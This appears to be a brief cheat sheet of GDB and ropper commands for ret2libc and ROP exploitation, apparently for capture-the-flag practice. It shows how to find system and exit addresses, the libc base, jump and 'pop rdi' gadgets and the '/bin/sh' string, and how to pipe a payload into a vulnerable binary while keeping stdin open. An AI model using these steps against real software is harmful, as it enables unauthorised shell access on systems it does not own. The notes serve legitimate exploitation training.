Make sure to set a breakpoint and run the program before running below commands when trying from GDB
# Find system address
p system
xinfo system
#Find Exit address
p exit
#Chek if libc is being used or not - copy libc to current working directory for ease of use.
# Copy Libc base address
# Default path = /lib/x86_64-linux-gnu/
vmmap libc
#Find JMP RSP or JMP RAX or any other instruction
# if you are unable to find an instruction in your vuln binary, search for the string in libc
file ./vuln or file ./libc
search jmp rsp
#if you are unable to find JMP instruction try CALL
search call rsp
#Finding "/bin/sh"
find "/bin/sh"
strings -a -t x | grep "/bin/sh"
ropper --file --string '/bin/sh'
# Search for ret instruction, look for a single ret without any other instructions.
ropper --file --search "ret"
0x00000000000008aa: ret;
#When you take an address from libc externally or using ropper, you need to add libc base address that you got from `vmmap libc` first address with the address that you got from ropper or strings. - its the same with any other instructions.
#Change ropper serach depth -
# 1 - 1 level down, /2/ - 2 levels down
# better to pick a gadget that ends with ret for ret2libc
> file ./vuln_file or file ./libc
> search /1/ pop rdi
#Keep the STDIN open
(cat payload;cat ) | ./vuln